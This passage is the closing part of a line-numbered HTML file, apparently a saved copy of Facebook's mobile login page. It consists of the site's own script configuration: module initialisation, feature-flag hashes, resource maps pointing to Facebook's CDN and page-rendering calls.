1296 "__m": "__elem_49f6b607_0_0"
1297 }]
1298 ]
1299 ],
1300 ["MScrollPositionSaver"],
1301 ["MLogoutClearCache"],
1302 ["LoadingIndicator", "init", ["__elem_eed16c0a_0_0", "__elem_a588f507_0_0", "__elem_a588f507_0_1"],
1303 [{
1304 "__m": "__elem_eed16c0a_0_0"
1305 }, {
1306 "__m": "__elem_a588f507_0_0"
1307 }, {
1308 "__m": "__elem_a588f507_0_1"
1309 }]
1310 ],
1311 ["MPageError"],
1312 ["MPageHeaderAccessibility"],
1313 ["MBlockingTouchable", "init", ["__elem_0cdc66ad_0_0"],
1314 [{
1315 "__m": "__elem_0cdc66ad_0_0"
1316 }]
1317 ],
1318 ["MBlockingTouchable", "init", ["__elem_0cdc66ad_0_1"],
1319 [{
1320 "__m": "__elem_0cdc66ad_0_1"
1321 }]
1322 ],
1323 ["MLoadingIndicator", "init", [],
1324 ["u_0_a"]
1325 ],
1326 ["MPrelude"],
1327 ["CavalryLoggerImpl", "startInstrumentation", [],
1328 []
1329 ],
1330 ["Artillery", "disable", [],
1331 []
1332 ],
1333 ["ArtilleryOnUntilOffLogging", "disable", [],
1334 []
1335 ],
1336 ["ArtilleryRequestDataCollection", "disable", [],
1337 ["6585945071258867252-0"]
1338 ],
1339 ["LogHistoryListeners"],
1340 ["Artillery"],
1341 ["ScriptPath", "set", [],
1342 ["XLoginController", "4e6eefd9", {
1343 "imp_id": "adee031e",
1344 "ef_page": null
1345 }]
1346 ],
1347 ["MLogging", "main", [],
1348 [{
1349 "refid": 9
1350 }]
1351 ],
1352 ["RemoteDevice", "init", [],
1353 []
1354 ],
1355 ["MModalDialogInit"],
1356 ["MVerifyCache", "main", [],
1357 [{
1358 "viewer": 0
1359 }]
1360 ],
1361 ["EventProfiler"],
1362 ["ScriptPathLogger", "startLogging", [],
1363 []
1364 ],
1365 ["MTimeSpentBitArrayLogger", "init", [],
1366 ["m"]
1367 ],
1368 ["NavigationMetrics"],
1369 ["PerfXLogger"],
1370 ["ServiceWorkerURLCleaner", "removeRedirectID", [],
1371 []
1372 ]
1373 ]
1374 },
1375 "isWildeWeb": false,
1376 "isFacewebAndroid": false,
1377 "ixData": {},
1378 "bxData": {},
1379 "gkxData": {
1380 "AT5tMpZqIKh0vdvJexCKKhPqDfMAWQPHLQnR8CgtajZUMLAZP8rj8YnSD9bEFc4BrmsaxTBmOCxn2mR6tM_ew1hH": {
1381 "result": false,
1382 "hash": "AT4koSF_B8zV-JGU"
1383 },
1384 "AT7zMB0I7eORfH-UodO4y3BTPg5wOO8T247ZMNn2q5-aNcyAQUvzZrGn32ptMehFmO1oqnCJmh_zFD3-bdTI6XU3_0z7OLdKJrGgHtrOitBdeg": {
1385 "result": false,
1386 "hash": "AT5m_XrqzDNoVeno"
1387 },
1388 "AT4miIiW4pJzE0dukYVRr93bo-U7aeRzegmes3xLz6J7QfAO9xBCVDCcWNxQBaSegngcbU8UJ8KqD-c2mDX0kNsMkP4Db418yITqzzh_hAbRIA": {
1389 "result": false,
1390 "hash": "AT5afYnsjvg9hGja"
1391 },
1392 "AT68bJwSI-83elN-7JSMMH9zt32KbiF6pW-XMlf6NViAJ3CbAk_16Vq8cK1tl1029_ApvFwINR8hmoci3nMKFTDhDCBp1wrvYQbOKq0pCjZpqA": {
1393 "result": false,
1394 "hash": "AT6-6Qzy649tdW6z"
1395 },
1396 "AT6vIKc4yvpLzvCe00DDqmWnCcWW9gg6lvyzBsK0MPzrJqNmyZ-lzLSw8lY20YNrZBEF7JSPcBJS9N9bCmn1zMDUn2EIk_0tdJz3AHqh5jmikg": {
1397 "result": false,
1398 "hash": "AT6DjxQv4PU-FWwl"
1399 },
1400 "AT5TADJ4IDqkBvMHj8JLNylXXgmWmvOXJO-tTCuV9i3mkXK-zBXm3JkLm3k6qxbTjLpJmVr_K5j2KZs32AccQJgX": {
1401 "result": false,
1402 "hash": "AT73DhyvaCgiwG3B"
1403 },
1404 "AT5uAQUkspJ5sV5Xpm3CYnJcVxdesf7hwzzLkJI-B3kAxPwbOQNyuBEaqOSMhhQFZNVatxaZNLeFd019lGnmAMYdCEX_PT8Q5ARV7No9dGPIyA": {
1405 "result": false,
1406 "hash": "AT4eKBVc3uLFz6G4"
1407 },
1408 "AT4kYIk7PhRqUACJJM8qs58t-WNCoM2ZYe35b1xv03xf3OtmC7RfXVIT9hWB6yTOgfA": {
1409 "result": false,
1410 "hash": "AT7aPYbTqh1ZR5CO"
1411 },
1412 "AT42vHZv2FMRQFxjYy8soPYLMZQ4FvEb3npoHjDNtK5L_ed7xyu66vqbi4snBVFxLSGN0ZKY0U-z6rBE6MS3Ht3lEToi6aqMBaQBAYDf8hAjMw": {
1413 "result": false,
1414 "hash": "AT7by7lUArIHEwdO"
1415 },
1416 "AT64OjP4oVuvstFjzbDT-bVZiPbiojG0zyjbyWGW5xqhWd5PV8lOQAaU0boVR7zf5v2SUGNGfZkpE7I19ksV-nLimTCJ0AgU9faj1FK9VMmZbw": {
1417 "result": false,
1418 "hash": "AT5d56P_XiFANF8j"
1419 }
1420 },
1421 "bootloadable": {
1422 "BanzaiODS": {
1423 "resources": ["Q8\/RR"],
1424 "module": 1
1425 },
1426 "GeneratedPackerUtils": {
1427 "resources": ["uYbVb", "qlimw"],
1428 "module": 1
1429 },
1430 "SnappyCompressUtil": {
1431 "resources": ["6g0i4"],
1432 "module": 1
1433 },
1434 "GeneratedArtilleryUserTimingSink": {
1435 "resources": ["uYbVb", "9Zaf3", "sGe+Z", "Hx+az"],
1436 "module": 1
1437 },
1438 "ErrorSignal": {
1439 "resources": ["Q8\/RR", "+SmSb"],
1440 "module": 1
1441 },
1442 "Banzai": {
1443 "resources": [],
1444 "module": 1
1445 },
1446 "BanzaiStream": {
1447 "resources": ["6g0i4", "Q8\/RR", "ZU1ro"],
1448 "module": 1
1449 },
1450 "PerfXSharedFields": {
1451 "resources": ["Q8\/RR"],
1452 "module": 1
1453 },
1454 "ResourceTimingBootloaderHelper": {
1455 "resources": ["6g0i4"],
1456 "module": 1
1457 },
1458 "TimeSliceHelper": {
1459 "resources": ["GefKK"],
1460 "module": 1
1461 },
1462 "TimeSliceInteractionsLiteTypedLogger": {
1463 "resources": ["Q8\/RR", "FHtgt"],
1464 "module": 1
1465 },
1466 "WebSpeedInteractionsTypedLogger": {
1467 "resources": ["Q8\/RR", "4LL\/S"],
1468 "module": 1
1469 }
1470 },
1471 "resource_map": {
1472 "uYbVb": {
1473 "type": "js",
1474 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/Vs01pkrhf9S.js",
1475 "crossOrigin": 1
1476 },
1477 "qlimw": {
1478 "type": "js",
1479 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yb\/r\/bIkOJ3EDb-E.js",
1480 "crossOrigin": 1
1481 },
1482 "9Zaf3": {
1483 "type": "js",
1484 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yv\/r\/5ka10Uff-_R.js",
1485 "crossOrigin": 1
1486 },
1487 "sGe+Z": {
1488 "type": "js",
1489 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/-sDNioLKB_z.js",
1490 "crossOrigin": 1
1491 },
1492 "Hx+az": {
1493 "type": "js",
1494 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yz\/r\/bza1TvaqddI.js",
1495 "crossOrigin": 1
1496 },
1497 "uyJZ4": {
1498 "type": "js",
1499 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irg24\/y9\/l\/en_GB\/5goD1D9XpS_.js",
1500 "crossOrigin": 1
1501 },
1502 "+SmSb": {
1503 "type": "js",
1504 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/r\/FkeMioPbpf5.js",
1505 "crossOrigin": 1
1506 },
1507 "ZU1ro": {
1508 "type": "js",
1509 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yq\/r\/708Ezmm99ay.js",
1510 "crossOrigin": 1
1511 },
1512 "GefKK": {
1513 "type": "js",
1514 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/u1iGD_tsUG0.js",
1515 "crossOrigin": 1
1516 },
1517 "FHtgt": {
1518 "type": "js",
1519 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/rlVu09x5_nO.js",
1520 "crossOrigin": 1
1521 },
1522 "4LL\/S": {
1523 "type": "js",
1524 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yA\/r\/rw8eejqoJci.js",
1525 "crossOrigin": 1
1526 },
1527 "FEt5G": {
1528 "type": "js",
1529 "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yo\/r\/2p2n-4YaSvj.js",
1530 "crossOrigin": 1
1531 }
1532 }
1533 });
1534 </script>
1535 <script id="u_0_l">
1536 require("MRenderingScheduler").getInstance().init("6585945071258867252-0", {
1537 "ttiPagelets": []
1538 });
1539 </script>
1540 <script id="u_0_m">
1541 require("MRenderingScheduler").preArrive({
1542 "name": "pagelet_0_0",
1543 "serverlid": "6585945071258867252-0"
1544 })
1545 </script>
1546 <script id="u_0_n">
1547 require("MRenderingScheduler").getInstance().schedule({
1548 "id": "pagelet_0_0",
1549 "pageletConfig": {
1550 "lid": "6585945071258867252-60001",
1551 "serverlid": "6585945071258867252-0",
1552 "name": "pagelet_0_0",
1553 "pass": 4,
1554 "serverJSData": [],
1555 "onload": "",
1556 "onafterload": "",
1557 "scheduledMarkupIndex": 0,
1558 "templateContainer": "static_templates",
1559 "templates": {
1560 "__html": ""
1561 },
1562 "ixData": {},
1563 "bxData": {},
1564 "gkxData": {},
1565 "resource_map": {},
1566 "bootloadable": {},
1567 "type": "chrome"
1568 },
1569 "displayResources": [],
1570 "normalResources": [],
1571 "content": {
1572 "__html": ""
1573 }
1574 }, function() {
1575 require("NavigationMetrics").postPagelet(false, "pagelet_0_0", "6585945071258867252-0");
1576 });
1577 </script>
1578 <script id="u_0_p">
1579 require("Bootloader").setResourceMap({});
1580 </script>
1581 <script id="u_0_o">
1582 require("MRenderingScheduler").getInstance().setPageletCount(1);
1583 require("NavigationMetrics").setPage({
1584 "page": "XLoginController",
1585 "page_type": "normal",
1586 "page_uri": "https:\/\/m.facebook.com\/login.php?refsrc=https\u00253A\u00252F\u00252Fm.facebook.com\u00252Flogin.php&_rdr",
1587 "serverLID": "6585945071258867252-0"
1588 });
1589 require("TimeSlice").guard(function() {
1590 (require("ServerJSDefine")).handleDefines([]);
1591 new(require("ServerJS"))().handle({});
1592 }, "ServerJS define", {
1593 "root": true
1594 })();
1595 require("TimeSlice").guard(function() {
1596 (require("ServerJSDefine")).handleDefines([]);
1597 new(require("ServerJS"))().handle({});
1598 }, "ServerJS define", {
1599 "root": true
1600 })();
1601 </script>
1602</body>
1603
1604</html>